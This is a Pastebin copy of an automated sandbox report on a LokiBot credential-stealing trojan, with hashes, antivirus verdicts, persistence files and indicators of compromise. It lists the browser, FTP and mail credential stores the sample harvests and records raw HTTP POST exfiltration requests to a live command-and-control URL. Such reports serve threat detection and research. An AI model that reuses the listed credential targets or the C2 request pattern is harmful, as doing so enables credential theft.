Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Lokibot"
- * MalScore: 10.0
- * File Name: "00227804"
- * File Size: 886272
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "a3f3cddf09f10ff782a96be311c767e336b25af010d0720a9a8e8a275bb6f37a"
- * MD5: "a33526b80aed53c525834a15dff6f486"
- * SHA1: "82d64786027ab8db5ee5f738b1f1b8e487a1cd89"
- * SHA512: "d5ba382c396a85dafc00a8493b6a653767eb494d4063a37e576bb5c6243913a49957350eb872c63cde74bda9854fb44888ded2dc4546c9b9e390da5a717aa13b"
- * CRC32: "EF9A6D71"
- * SSDEEP: "12288:j8MI3z8rANQUWpBZY6vcxDyJaOBXS7DGCAhGFgZahbCk9DclCbXuFF+zdxNL:E3uANjWpNCD4lRS1KZC9XuwjNL"
- * Process Execution:
- "00227804.exe",
- "odjf.exe",
- "odjf.exe",
- "services.exe",
- "lsass.exe",
- "sdclt.exe",
- "taskhost.exe",
- "sc.exe",
- "svchost.exe",
- "svchost.exe",
- "WerFault.exe",
- "wermgr.exe",
- "svchost.exe",
- "WerFault.exe",
- "wermgr.exe"
- * Executed Commands:
- "\"C:\\Users\\user\\AppData\\Roaming\\ndiso\\odjf.exe\"",
- "C:\\Windows\\system32\\lsass.exe",
- "C:\\Windows\\System32\\sdclt.exe /CONFIGNOTIFICATION",
- "taskhost.exe $(Arg0)",
- "C:\\Windows\\system32\\sc.exe start w32time task_started",
- "C:\\Windows\\system32\\svchost.exe -k LocalService",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "C:\\Windows\\system32\\WerFault.exe -u -p 3060 -s 288",
- "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\"",
- "C:\\Windows\\system32\\WerFault.exe -u -p 1056 -s 108",
- "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\""
- * Signatures Detected:
- "Description": "At least one process apparently crashed during execution",
- "Details":
- "Description": "Creates RWX memory",
- "Details":
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "odjf.exe tried to sleep 1275 seconds, actually delayed analysis time by 0 seconds"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "http_version_old": "HTTP traffic uses version 1.0"
- "suspicious_request": "http://waiptxin.eu/sleek2/cat.php"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://waiptxin.eu/sleek2/cat.php"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "odjf.exe(1792) -> odjf.exe(1328)"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13907803 times"
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ndiso.vbs"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ndiso.vbs"
- "Description": "Creates a hidden or system file",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
- "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
- "Description": "File has been identified by 42 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "Trojan.Agent.EAZY"
- "McAfee": "Fareit-FOZ!A33526B80AED"
- "Cylance": "Unsafe"
- "K7AntiVirus": "Riskware ( 0040eff71 )"
- "Alibaba": "Backdoor:Win32/LokiBot.6e2b0742"
- "K7GW": "Riskware ( 0040eff71 )"
- "Cybereason": "malicious.6027ab"
- "F-Prot": "W32/Fareit.DDQ"
- "Symantec": "Trojan.Gen.MBT"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "GData": "Trojan.Agent.EAZY"
- "Kaspersky": "HEUR:Backdoor.Win32.Androm.gen"
- "BitDefender": "Trojan.Agent.EAZY"
- "Avast": "Win32:Malware-gen"
- "Endgame": "malicious (high confidence)"
- "Sophos": "Mal/Fareit-V"
- "DrWeb": "Trojan.PWS.Stealer.19347"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.ch"
- "FireEye": "Generic.mg.a33526b80aed53c5"
- "Emsisoft": "Trojan.Agent.EAZY (B)"
- "SentinelOne": "DFI - Suspicious PE"
- "Cyren": "W32/Fareit.TLGU-5258"
- "Webroot": "W32.Trojan.Gen"
- "Arcabit": "Trojan.Agent.EAZY"
- "AegisLab": "Trojan.Win32.Androm.m!c"
- "ZoneAlarm": "HEUR:Backdoor.Win32.Androm.gen"
- "Microsoft": "Trojan:Win32/LokiBot.DW!MTB"
- "AhnLab-V3": "Win-Trojan/Delphiless.Exp"
- "Acronis": "suspicious"
- "VBA32": "BScope.Trojan.Kryptik"
- "MAX": "malware (ai score=100)"
- "Ad-Aware": "Trojan.Agent.EAZY"
- "Malwarebytes": "Trojan.MalPack.DLF"
- "ESET-NOD32": "a variant of Win32/Injector.EGTX"
- "TrendMicro-HouseCall": "TrojanSpy.Win32.LOKI.SMDD.hp"
- "Rising": "Trojan.Injector!1.AF18 (CLASSIC)"
- "Ikarus": "Trojan.Win32.Injector"
- "Fortinet": "W32/Injector.EGKJ!tr"
- "AVG": "Win32:Malware-gen"
- "CrowdStrike": "win/malicious_confidence_100% (W)"
- "Description": "Checks the system manufacturer, likely for anti-virtualization",
- "Details":
- "Description": "Creates a copy of itself",
- "Details":
- "copy": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
- "Description": "Harvests credentials from local FTP client softwares",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
- "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
- "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
- "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
- "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
- "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
- "Description": "Harvests information related to installed instant messenger clients",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- "Description": "Harvests information related to installed mail clients",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
- "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\ndiso\\odjf.exe:ZoneIdentifier"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Anomalous binary characteristics",
- "Details":
- "anomaly": "Timestamp on binary predates the release date of the OS version it requires by at least a year"
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
- "signature": "ET TROJAN LokiBot Fake 404 Response"
- "signature": "ET TROJAN LokiBot Checkin"
- "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
- "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
- "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
- "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
- * Started Service:
- "VaultSvc",
- "WerSvc",
- "W32Time"
- * Mutexes:
- "6EFA73A4746045B65DEE781E",
- "Local\\WERReportingForProcess3060",
- "Global\\\\xe5\\x88\\x90\\xc2\\x9d",
- "Global\\\\xed\\x95\\xb0\\xc7\\xa6",
- "WERUI_BEX64-30ff788d55c8dd8e13e51cbc4a41a06fb37b455",
- "Local\\WERReportingForProcess1056",
- "Global\\\\xe5\\x88\\x90\\xc2\\x8d",
- "Global\\\\xed\\x99\\xb0\\xc7\\x88",
- "WERUI_APPCRASH-5c9dc22e27dc86b7ce5726e7d9b5fc15b4163"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Roaming\\ndiso\\odjf.exe",
- "C:\\Users\\user\\AppData\\Roaming\\ndiso\\odjf.exe:ZoneIdentifier",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ndiso.vbs",
- "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
- "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\2ce1541b-c7b1-4ba0-8974-722d18a3c54d",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\4e6828f4-11de-47bf-b7df-2249f4bdea4e",
- "\\??\\PIPE\\lsarpc",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB463.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB771.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB791.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD7E.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\WERB463.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\WERB771.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\WERB791.tmp.hdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\WERBD7E.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\Report.wer",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\Report.wer.tmp",
- "C:\\Windows\\Temp\\WERA006.tmp.appcompat.txt",
- "C:\\Windows\\Temp\\WERA065.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\Temp\\WERA0E3.tmp.hdmp",
- "C:\\Windows\\Temp\\WERAAD7.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\WERA006.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\WERA065.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\WERA0E3.tmp.hdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\WERAAD7.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\Report.wer",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\Report.wer.tmp"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Roaming\\ndiso\\odjf.exe",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ndiso.vbs",
- "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB463.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB463.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB771.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB771.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB791.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB791.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD7E.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD7E.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\Report.wer.tmp",
- "C:\\Windows\\Temp\\WERA006.tmp",
- "C:\\Windows\\Temp\\WERA006.tmp.appcompat.txt",
- "C:\\Windows\\Temp\\WERA065.tmp",
- "C:\\Windows\\Temp\\WERA065.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\Temp\\WERA0E3.tmp",
- "C:\\Windows\\Temp\\WERA0E3.tmp.hdmp",
- "C:\\Windows\\Temp\\WERAAD7.tmp",
- "C:\\Windows\\Temp\\WERAAD7.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\Report.wer.tmp"
- * Modified Registry Keys:
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\ExceptionRecord",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "waiptxin.eu",
- "answers":
- "data": "47.254.214.55",
- "type": "A"
- * Domains:
- "ip": "47.254.214.55",
- "domain": "waiptxin.eu"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 2,
- "body": "",
- "uri": "http://waiptxin.eu/sleek2/cat.php",
- "user-agent": "Mozilla/4.08 (Charon; Inferno)",
- "method": "POST",
- "host": "waiptxin.eu",
- "version": "1.0",
- "path": "/sleek2/cat.php",
- "data": "POST /sleek2/cat.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: waiptxin.eu\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C6C7D52C\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
- "port": 80
- "count": 21,
- "body": "",
- "uri": "http://waiptxin.eu/sleek2/cat.php",
- "user-agent": "Mozilla/4.08 (Charon; Inferno)",
- "method": "POST",
- "host": "waiptxin.eu",
- "version": "1.0",
- "path": "/sleek2/cat.php",
- "data": "POST /sleek2/cat.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: waiptxin.eu\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C6C7D52C\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement